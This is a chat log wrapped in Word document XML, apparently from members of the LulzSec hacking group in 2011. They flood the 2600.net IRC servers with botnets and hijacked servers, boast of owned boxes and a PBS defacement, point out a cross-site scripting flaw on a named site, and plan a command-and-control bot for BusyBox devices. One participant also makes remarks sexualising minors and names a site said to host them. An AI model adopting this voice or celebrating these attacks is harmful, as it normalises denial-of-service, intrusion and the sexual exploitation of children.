      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:07:25 storm sec Jun 01 06:07:28 storm ya Jun 01 06:07:29 storm got it Jun 01 06:07:32 lol :) Jun 01 06:07:50 lol there's alot to config in it :O Jun 01 06:08:05 lol but hopefully the google bypass "google.php" will still work :D Jun 01 06:08:09 storm i wouldnt know, it looks like a rar file :P Jun 01 06:08:14 storm it is a rar file!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:08:19 storm FARKIN HELL Jun 01 06:08:20 storm lol Jun 01 06:08:23 lol *windows* Jun 01 06:08:24 lol xD Jun 01 06:08:27 storm what kind of linux hacked box has rar Jun 01 06:08:27 storm !!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:09:13 lol xD Jun 01 06:09:34 storm 06:09 -!- |- djslocker.2600.net ---------------------- - | Users: 21 Jun 01 06:10:48 Topiary collective.2600.net ------------------------------ | Users: 80 (38.8% Jun 01 06:11:10 storm lmao Jun 01 06:11:11 storm dude Jun 01 06:11:16 storm i took down everything then Jun 01 06:11:20 storm cause madjacks nulled Jun 01 06:11:35 Topiary just got kicked off collective Jun 01 06:11:45 storm lolz Jun 01 06:11:50 Topiary we should just do this every day until they refuse to house Jester Jun 01 06:11:51 storm should i let it back up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:12:05 Topiary whatever you want Jun 01 06:12:13 storm k Jun 01 06:13:49 Topiary or maybe we should just pwn 2600.net itself Jun 01 06:16:21 storm well that was fun XD Jun 01 06:17:48 Topiary I love their little clique circlejerks Jun 01 06:17:55 Topiary they all have a little retweet party with themselves Jun 01 06:18:11 storm they tweeting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:19:00 Topiary yeah check out the feeds of @mach2600 @fakegregghoush @awinee and all retweets Jun 01 06:19:15 Topiary these are the same guys who specifically went after Sabu + our crew back in Feb with HBGary Jun 01 06:19:24 Topiary they're a lovable bunch of scoundrels Jun 01 06:21:10 Topiary err, madjack just disappeared :x Jun 01 06:22:00 storm lol Jun 01 06:25:04 joepie92 disappeared as in...?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:25:33 Topiary it's back Jun 01 06:25:48 storm its cause it gets nulled Jun 01 06:25:49 storm for 5 min Jun 01 06:26:23 storm lol Jun 01 06:26:35 storm thats the funnest shit ive done with 2 servers _ Jun 01 06:26:45 storm who woulda thought 3 ircds could die to 2 boxes Jun 01 06:27:13 Topiary well it's good taking out 2/3, watching them scramble to the 3rd, letting them come back, then fucking the 3rd while laying off the other 2 Jun 01 06:27:19 Topiary like playing with rats and switches Jun 01 06:27:37 storm haha Jun 01 06:27:41 storm i could drop all 3 at once Jun 01 06:27:45 storm if i wanted Jun 01 06:27:50 storm just take 2 more box logins Jun 01 06:28:05 storm but theres no fun in that ;&lt; Jun 01 06:28:29 Topiary * [Brainsturbator] (skully2012@71-23-43- 101.war.clearwire-wmx.net): Agent Skully Jun 01 06:28:29 Topiary * [Brainsturbator] #lulzsec #secnews #telephreak #2600 Jun 01 06:28:30 Topiary who is this?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:28:48 storm no idea Jun 01 06:28:58 Topiary we don't either, hmm Jun 01 06:30:51 storm Agent Skully Jun 01 06:30:55 storm better watch out Jun 01 06:31:00 storm hes an 4g3n+ Jun 01 06:31:46 joepie92 lolol Jun 01 06:31:47 joepie92 Since the hack, LulzSec has turned it attention towards patriot hacker Jester, the most prominent member of the anti- Wikileaks cyber-militia, who attacked WikiLeaks after the release of US diplomatic cables. Unsurprisingly, LulzSec claimed his hacks were "lame" before threatening an attack against long-running hacker magazine 2600. Jun 01 06:31:50 joepie92 jester gonna be mad Jun 01 06:31:54 joepie92 I R NO PART OF MILITIA Jun 01 06:31:56 joepie92 I R LONE WOLF Jun 01 06:32:09 Topiary &gt;claimed his hacks Jun 01 06:32:11 Topiary &gt;his hacks Jun 01 06:32:15 Topiary we actually claimed he did no hacks Jun 01 06:32:16 Topiary which he didn't Jun 01 06:32:24 Topiary please name one time Jester has hacked anything, I dare ya Jun 01 06:32:33 storm lol Jun 01 06:32:52 joepie92 I suppose you could call modding LOIC to collect IPs, hacking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:33:02 joepie92 [/devilsadvocate[ Jun 01 06:33:03 joepie92 ]* Jun 01 06:42:18 lol lol xD Jun 01 06:42:26 lol i read on some sec site Jun 01 06:42:31 lol who has a j35t3r page Jun 01 06:42:44 lol wrote how someone "cracked LOIC and altered it" Jun 01 06:42:58 lol lol i was like "errr.... the src is pub lol" Jun 01 06:44:03 lol when all my brazillians get on im gonna dos them too :3 Jun 01 06:44:32 lol only 34 in channel :o pointless yet, wait for the brazillians get get online should have about 70/80 :D Jun 01 06:45:29 Topiary I snagged us some nice USAs the other day Jun 01 06:45:35 Topiary hopefully good net Jun 01 06:45:49 lol yeh :D Jun 01 06:46:14 lol those [NEW] in there are US installs too i think Jun 01 06:46:34 storm rofl Topiary Jun 01 06:46:37 storm your servers down Jun 01 06:46:52 Topiary damnit I was on collective Jun 01 06:46:56 Topiary and so are you &gt;:[ Jun 01 06:47:10 storm not uh Jun 01 06:47:12 storm im on djs Jun 01 06:47:15 storm i think Jun 01 06:47:18 Topiary no sir Jun 01 06:47:21 Topiary we're all on collective Jun 01 06:47:36 Topiary ohhhh shit Jun 01 06:47:41 Topiary you guys are, I'm on collective Jun 01 06:47:43 Topiary ffffffff Jun 01 06:48:05 storm lolllllllll Jun 01 06:48:10 storm lets switch servers then Jun 01 06:49:30 joepie92 cam someone explain to me why windows software running through WINE on puppy linux in a virtualbox instance runs faster than natively on the host windows system Jun 01 06:49:36 joepie92 :| Jun 01 06:49:38 joepie92 can* Jun 01 06:52:40 storm Topiary can you map?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:52:46 storm on collective Jun 01 06:52:56 Topiary * collective.2600.net ------------------------------ | Users: 204 (49.4%) Jun 01 06:52:56 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 06:52:56 Topiary * |- madjack.2600.net ------------------------- | Users: 99 (24.0%) Jun 01 06:52:56 Topiary * |- djslocker.2600.net ----------------------- | Users: 101 (24.5%) Jun 01 06:52:56 Topiary * '- services.2600.net ------------------------ | Users: 9 (2.2% Jun 01 06:53:01 storm so it worked Jun 01 06:53:03 storm bah!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:53:04 storm lol Jun 01 06:53:11 storm they definitely changed the server around Jun 01 06:54:21 lol what channel are you guys in over there :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:54:30 Topiary lulzsec Jun 01 06:54:33 Topiary and 2600 Jun 01 06:56:39 storm cant believe they stepped up their game Jun 01 06:56:41 storm lmao Jun 01 06:57:02 lol op me am parr0t xD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07:03:13 storm 07:01 -!- bottle_of_rum [~bottle_of@72.46.129.46] has quit [Ping timeout: 240 Jun 01 07:03:13 storm seconds] Jun 01 07:03:13 storm 07:01 -!- echo [~echo@pool-108-27-212- 254.nycmny.fios.verizon.net] has quit Jun 01 07:03:13 storm [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:01 -!- RootBSD_ [~rootbsd@r00ted.com] has quit [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:02 -!- bottle_of_rum [~bottle_of@72.46.129.46] has joined #2600 Jun 01 07:03:13 storm 07:02 &lt; storm&gt; uh oh Jun 01 07:03:13 storm 07:02 -!- isaac [~isaac@24.167.38.73] has quit [Ping timeout: 240 seconds] Jun 01 07:03:13 storm 07:02 -!- m0no [natas@c-75-67-212- 35.hsd1.ma.komcast.net] has quit [Quit: Jun 01 07:03:13 storm changing servers] Jun 01 07:03:14 storm 07:02 -!- ZadYree [~ZadY@ip-87.net-89-2- 31.rev.numericable.fr] has quit [Ping Jun 01 07:03:15 storm timeout: 240 seconds] Jun 01 07:03:16 storm 07:02 -!- warmonger [~hehe@108-65-79- 77.lightspeed.sntcca.sbcglobal.net] has Jun 01 07:03:16 storm quit [Ping timeout: 240 seconds] Jun 01 07:03:18 storm 07:02 &lt; storm&gt; magickal Jun 01 07:03:18 storm 07:02 -!- The_Blob [~blob@S010600c00cb01b8c.vs.shawcable.net] has quit [Ping Jun 01 07:03:19 lol lol @ Highest connection count: 802 (801 clients) (95744 connections received) Jun 01 07:03:20 storm timeout: 240 seconds] Jun 01 07:03:21 storm 07:03 &lt; storm&gt; magickal indeed Jun 01 07:03:22 storm 07:03 -!- WebDawg [~whoami@officialg0d.com] has quit [Ping timeout: 240 seconds] Jun 01 07:03:22 storm lmfao Jun 01 07:03:24 sabu its that sx Jun 01 07:03:26 sabu sex Jun 01 07:03:44 lol sbau you're the sex ;D Jun 01 07:03:57 Topiary well lawdy Jun 01 07:04:16 lol abusing 2600 is rather amusing Jun 01 07:04:35 storm lolz Jun 01 07:04:50 storm Flood completed, 254326485 packets sent, 447 seconds, 568963 packets/sec Jun 01 07:04:51 sabu lol Jun 01 07:04:58 sabu I wake up to storm packeting Jun 01 07:05:02 storm lol Jun 01 07:05:03 sabu and kayla excited Jun 01 07:05:04 sabu &lt;3 Jun 01 07:05:06 storm xD Jun 01 07:05:11 sabu what you niggas been doing without me Jun 01 07:05:20 storm owning 2600.net Jun 01 07:05:21 storm about it Jun 01 07:05:39 sabu jEa Jun 01 07:06:05 joepie92 lol Jun 01 07:06:15 joepie92 morning Sabu Jun 01 07:11:12 storm indeed Jun 01 07:11:15 storm morning Jun 01 07:11:45 sabu morning joepie Jun 01 07:11:50 sabu hows everyone doing?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:11:51 * Sabu gives channel operator status to [redacted] value Topiary lol Jun 01 07:12:17 storm nulled madjack Jun 01 07:12:19 storm again Jun 01 07:12:20 storm lol Jun 01 07:12:31 sabu lol Jun 01 07:12:39 sabu they're going to end up losing some servers Jun 01 07:13:12 sabu I want to own 2600 servers themselves Jun 01 07:14:21 Topiary that would be awesome Jun 01 07:16:42 sabu topiary my brother how are you Jun 01 07:17:34 storm Topiary watch for magickal splitz Jun 01 07:17:38 Topiary good Sabu, what's up?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:18:58 sabu nothing broscope just woke up tired as balls Jun 01 07:22:01 joepie92 my fucking god Jun 01 07:22:07 joepie92 evilworks raging out of his fucking skull Jun 01 07:22:16 Topiary what about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:22:25 joepie92 earlier today he sajoined the entire network to #lounge Jun 01 07:22:29 joepie92 and then did a massive spam/highlight Jun 01 07:22:31 joepie92 of everyone in the channel Jun 01 07:22:40 joepie92 and consecutively got localkilled by me and owen Jun 01 07:22:45 joepie92 now like 10 mins ago Jun 01 07:22:48 joepie92 he starts raging in #opers Jun 01 07:22:52 joepie92 that he is missing some capabilities Jun 01 07:22:52 joepie92 as oper Jun 01 07:22:58 joepie92 and is apparently not in the operserv admin list anymoer Jun 01 07:23:05 joepie92 starts masshighlighting opers Jun 01 07:23:05 Topiary yeah remember that he killed both of us for simply disagreeing with him?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:23:10 joepie92 raging out of his skull Jun 01 07:23:15 joepie92 despite owen not even being fucking there Jun 01 07:23:16 Topiary in #reporter Jun 01 07:23:21 Topiary he's a hot-tempered child Jun 01 07:23:22 joepie92 and logic tells me that owen was the only person who could do that Jun 01 07:23:26 storm i remember owen Jun 01 07:23:43 joepie92 anyhow, after a localkill and some shouting back that he should calm the fuck down, he seems to be more calm now Jun 01 07:23:44 joepie92 -_- Jun 01 07:23:51 Topiary you know these chaps with IRC technical prowess have it covered in that area Jun 01 07:23:52 joepie92 "CAN'T YOU TAKE A JOKE?!?!" Jun 01 07:23:55 joepie92 seriously Jun 01 07:23:56 Topiary but outside of that, they're retarded Jun 01 07:24:02 joepie92 if you don't want shit to happen, then don't start shit yourself -_- Jun 01 07:24:14 joepie92 ugh Jun 01 07:24:30 joepie92 inb4 I get localkilled by evilworks again Jun 01 07:24:44 joepie92 crhist Jun 01 07:24:45 Topiary "agree with me or a z:line you" is evilworks' fodder Jun 01 07:24:45 joepie92 christ* Jun 01 07:24:48 joepie92 anyhow, /rant Jun 01 07:25:21 Topiary this will cheer you up; http://blogs.forbes.com/parmyolson/2011/05/31/interview-with-pbs-hackers-we- did-it-for-lulz-and-justice/ Jun 01 07:25:41 joepie92 lol, parmy is teh win Jun 01 07:26:06 Topiary it's fun to upset other journalists by giving parmy exclusives Jun 01 07:26:15 Topiary her original Tupac report got the most views of any Jun 01 07:26:18 joepie92 lool Jun 01 07:26:18 Topiary and it got tweeted by wikileaks Jun 01 07:26:21 joepie92 ye Jun 01 07:26:23 joepie92 and it got referenced Jun 01 07:26:25 joepie92 by all dutch news sources Jun 01 07:26:29 joepie92 also Jun 01 07:26:35 joepie92 inb4 raeg because it's poptart cat and not nyan cat Jun 01 07:26:46 Topiary over the last 6 months, we've probably given Parmy more views than she's had in her entire career Jun 01 07:27:23 Topiary still: http://i.imgur.com/DsgWI.jpg Jun 01 07:27:27 Topiary our greatest achievement to date?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:27:45 joepie92 lolol Jun 01 07:27:49 joepie92 nyancat in wsj Jun 01 07:28:05 joepie92 also, people help each other I guess :P Jun 01 07:28:13 joepie92 Parmy gets views, anon/lulzsec gets exposure Jun 01 07:28:23 joepie92 and notable sources :D Jun 01 07:28:42 Topiary Parmy has a friend over at WSJ, she's gonna ask him if they had a good time over the printing of nyan cat Jun 01 07:28:54 Topiary she's like our wonderful media outlet 0day Jun 01 07:29:01 joepie92 loool Jun 01 07:29:13 lol lololol Jun 01 07:29:28 Topiary Parmy "0day" Olson Jun 01 07:29:32 Topiary she's a nice lady Jun 01 07:30:13 joepie92 LulzSec also defaced the official PBS statement in response to the attack. PBS could not be reached for further comment. Jun 01 07:30:14 joepie92 lol Jun 01 07:30:19 Topiary ah yes Jun 01 07:30:19 joepie92 becauseyourfurthercommentpagewasdown.jpeg Jun 01 07:30:27 Topiary I believe that was "LOL FRONTLINE SUCKS COCKS" Jun 01 07:30:33 joepie92 ahaha Jun 01 07:30:38 Topiary http://pastehtml.com/view/avg12f6sz.html Jun 01 07:30:42 Topiary this used to be pbs.org/whiskey Jun 01 07:31:55 storm Nightmare966 NoName Jun 01 07:31:55 storm @ Jun 01 07:31:56 storm @LulzSec Lemme get this straight... You could do great things like ctaching pedos but you decide attack Sony ._.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:31:59 storm ROFLMFAO Jun 01 07:32:02 storm thats epic Jun 01 07:32:42 storm leave the paedos alone, they already haz it bad enough.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:32:51 Topiary it's actually true though, I dox'd a pedo once Jun 01 07:32:58 storm lol Jun 01 07:33:00 Topiary probably helped get him arrested Jun 01 07:33:08 storm yuck Jun 01 07:33:12 Topiary :( Jun 01 07:33:17 storm i hate anyone getting arrested Jun 01 07:33:21 Topiary well I never knew if he was arrested Jun 01 07:33:22 storm just a personal view of mine ;x Jun 01 07:33:28 Topiary didn't even know he was a pedo until I leaked his hotmail Jun 01 07:33:32 storm hahaha Jun 01 07:33:45 Topiary he had attachments of CP Jun 01 07:33:51 Topiary and chatted up young girls Jun 01 07:34:50 storm at least he had good taste Jun 01 07:34:51 storm ;x Jun 01 07:34:59 storm girls = way to be Jun 01 07:35:19 storm there are indefinite under age girls on motherless.com Jun 01 07:39:52 * storm see's everyone fapping Jun 01 07:43:35 lol :/ Jun 01 07:46:54 storm lol Jun 01 07:47:44 * lol helps Jun 01 07:48:53 storm OMG Jun 01 07:48:54 storm so Jun 01 07:49:01 storm my gigabit box i owned a few days ago Jun 01 07:49:06 storm has a publ;ic key to another one Jun 01 07:49:09 storm fucking owned Jun 01 07:49:09 storm ;x Jun 01 07:49:27 lol nice :D Jun 01 07:49:27 Topiary more cannons!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:49:39 Topiary you're definitely our LulzSec cannonfire officer Jun 01 07:49:46 lol 2xDATAFLOW Jun 01 07:49:54 Topiary kayla is our assassin/spy Jun 01 07:50:02 Topiary we dock in ports and she immerses = Jun 01 07:50:04 Topiary and eliminates Jun 01 07:50:10 lol i also bake cookies :3 Jun 01 07:50:52 lol currently 46 boats in the harbour Jun 01 07:51:16 lol * [ _]-70335 ([ _]-70335@HA-ek9.ljf.k5jhin.IP) Quit Jun 01 07:51:21 lol 45* Jun 01 07:54:07 * Topiary has quit (Ping timeout: 121 seconds) Jun 01 07:57:54 lol firing cannons @ collective.2600.net Jun 01 07:58:46 joepie92 stormi hate anyone getting arrested Jun 01 07:58:48 joepie92 agreed Jun 01 07:58:54 joepie92 last resort imo Jun 01 07:59:17 storm :] Jun 01 07:59:27 lol C:\Documents and Settings\kayla&gt;ping collective.2600.net Jun 01 07:59:27 lol Pinging collective.2600.net [208.111.35.75] with 32 bytes of data: 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Request timed out.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 07:59:27 lol Ping statistics for 208.111.35.75: Jun 01 07:59:27 lol Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Jun 01 07:59:27 lol C:\Documents and Settings\kayla&gt; Jun 01 07:59:30 lol looooooooooooool Jun 01 07:59:36 storm EWWWWWWWWW Jun 01 07:59:41 lol dos'd with 45 bots Jun 01 07:59:41 storm CMD PROMPT Jun 01 07:59:44 storm ZOMG Jun 01 07:59:46 storm I DIED Jun 01 07:59:50 lol lol Jun 01 07:59:53 storm lol Jun 01 07:59:53 storm :x Jun 01 07:59:56 lol :D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08:00:24 * joepie92 thinks kayla MUST have modded her terminal to look like cmd Jun 01 08:03:14 storm loll Jun 01 08:11:13 * Topiary (t@HA-31n.h6t.9puaba.IP) has joined #pure-elite Jun 01 08:12:48 joepie92 if you're bored Jun 01 08:12:49 joepie92 view- source:www.easyhits4u.com/index.cgi?warning=hai Jun 01 08:12:52 joepie92 er Jun 01 08:12:56 joepie92 http://www.easyhits4u.com/index.cgi?warning=hai Jun 01 08:13:11 lol whats tht ;p?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 08:13:13 * joepie92 smells XSS Jun 01 08:13:46 joepie92 :D Jun 01 08:14:12 storm hey kayla Jun 01 08:14:15 storm can i pm joo Jun 01 08:15:06 lol sure :D Jun 01 08:24:55 * voodoo has quit (Connection closed) Jun 01 08:36:38 * voodoo (voodoo@HA-32o.s8p.durho2.IP) has joined #pure- elite Jun 01 08:51:04 joepie92 some people Jun 01 08:51:05 joepie92 are so fucking stupid Jun 01 08:51:06 joepie92 "stupid" in the sense that they assume the current systems are the only way to go, that they will judge any system that works differently as "bad" or "inferior", and saying that you would be "throwing away hundreds of years of knowledge", ignoring the "tested systems" Jun 01 08:51:07 joepie92 and for ease of complaint, ignoring that those "tested systems" have fallen over and over again Jun 01 08:51:16 joepie92 http://www.quora.com/Is-the-cryptocurrency-Bitcoin- a-good-idea Jun 01 08:51:20 joepie92 read the top comment Jun 01 08:56:47 lol uname -a Jun 01 08:56:49 lol oops Jun 01 08:57:35 storm lol Jun 01 08:57:36 storm :D Jun 01 08:57:42 storm i do that a lot Jun 01 08:57:50 storm cause my terminals are transparent Jun 01 08:58:25 * Topiary has quit (Quit: sec)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09:03:10 joepie92 lol Jun 01 09:15:19 * Topiary (t@HA-d98.pu6.75e5ku.IP) has joined #pure-elite Jun 01 09:35:45 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 01 09:35:52 * pwnsauce (pwnsauce@HA-pin.jre.pn6gun.IP) has joined #pure- elite Jun 01 09:35:58 * anonny is now known as kl0ps Jun 01 09:36:06 kl0ps hello o/ Jun 01 09:36:14 pwnsauce heu Jun 01 09:36:17 pwnsauce *hey Jun 01 09:36:54 pwnsauce whass happening?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 09:37:35 kl0ps nothing, all is fine,... perfect ;) Jun 01 09:37:36 kl0ps sup Jun 01 09:37:37 kl0ps ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 09:48:28 pwnsauce not much Jun 01 09:55:02 Topiary I'm celebration of our whiskey page I am now using a Moldova server location Jun 01 09:55:04 Topiary *In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10:04:10 joepie92 buyvm gone again Jun 01 10:08:57 -NickServ- This nickname is registered and protected. If it is your Jun 01 10:08:57 -NickServ- nick, type /msg NickServ IDENTIFY password. Otherwise, Jun 01 10:08:57 -NickServ- please choose a different nick.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 10:15:46 * kl0ps has quit (Connection closed) Jun 01 10:28:43 * kay (parr0t@HA-p7h.2se.thhlfj.IP) has joined #pure-elite Jun 01 10:29:40 * lol has quit (Ping timeout: 121 seconds) Jun 01 10:38:17 * kay is now known as lol Jun 01 10:55:11 * pwnsauce has quit (Ping timeout: 121 seconds)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11:09:22 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 01 11:09:33 * anonny is now known as kl0ps Jun 01 11:31:49 * kl0ps has quit (Quit: Leaving)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12:13:58 * pwnsauce (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure- elite Jun 01 12:19:19 pwnsauce :D\-&lt; Jun 01 12:19:25 pwnsauce :D|-&lt; Jun 01 12:19:28 pwnsauce :D/-&lt; Jun 01 12:19:34 Topiary Jun 01 12:19:39 Topiary _________________________ Jun 01 12:19:45 Topiary ____________________________________________________________________ Jun 01 12:19:54 Topiary 8=========================D Jun 01 12:20:03 Topiary your stick dude fell into a sea of cocks Jun 01 12:20:35 joepie92 lolol Jun 01 12:20:43 * joepie92 does some shameless plugging for bitcoin Jun 01 12:21:37 * Neuron (Neuron@HA-26h.345.a84vd3.IP) has joined #pure- elite Jun 01 12:21:40 neuron o/ Jun 01 12:23:05 joepie92 lolwat Jun 01 12:23:06 joepie92 guise Jun 01 12:23:06 joepie92 http://nf.dyndns.org/?poll=3 Jun 01 12:23:16 joepie92 I seriously got more bitcoin donations Jun 01 12:23:19 joepie92 than pioneer one Jun 01 12:23:56 neuron lmfao wow Jun 01 12:23:57 neuron nice Jun 01 12:24:07 joepie92 I googled the anonnews address Jun 01 12:24:08 joepie92 and that came up Jun 01 12:24:08 joepie92 xD Jun 01 12:26:10 neuron hmm Jun 01 12:26:16 neuron ping dosen't like to be a background process Jun 01 12:28:01 joepie92 lolol Jun 01 12:29:04 neuron lol: you on?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:29:12 lol yeh :D Jun 01 12:29:37 neuron talked to [redacted] about everything Jun 01 12:29:44 neuron building a cnc system for the busybox's Jun 01 12:29:52 neuron lul for bash bot :D XD Jun 01 12:30:01 neuron if you can send me that list of all of them that would be awesome Jun 01 12:30:03 [redacted] sup Jun 01 12:30:08 neuron hey [redacted] o/ Jun 01 12:30:33 [redacted] just woke up :] Jun 01 12:32:00 * lol has quit (A TLS packet with unexpected length was received.) Jun 01 12:32:11 * lol (parr0t@HA-678.11n.cc0br2.IP) has joined #pure-elite Jun 01 12:32:19 neuron wb lol Jun 01 12:32:28 lol :) Jun 01 12:32:31 lol ty &lt;333 Jun 01 12:32:37 neuron lol: do you have the list on you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 12:32:58 lol no it's on my netbook, i should be able to get it tonight Jun 01 12:33:04 neuron lol: Idk if you left but i was talking to [redacted] and we decided to work on a small cnc type bot with the busybox's Jun 01 12:33:07 neuron bashbot XD Jun 01 12:33:08 lol did many from tht other list work?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
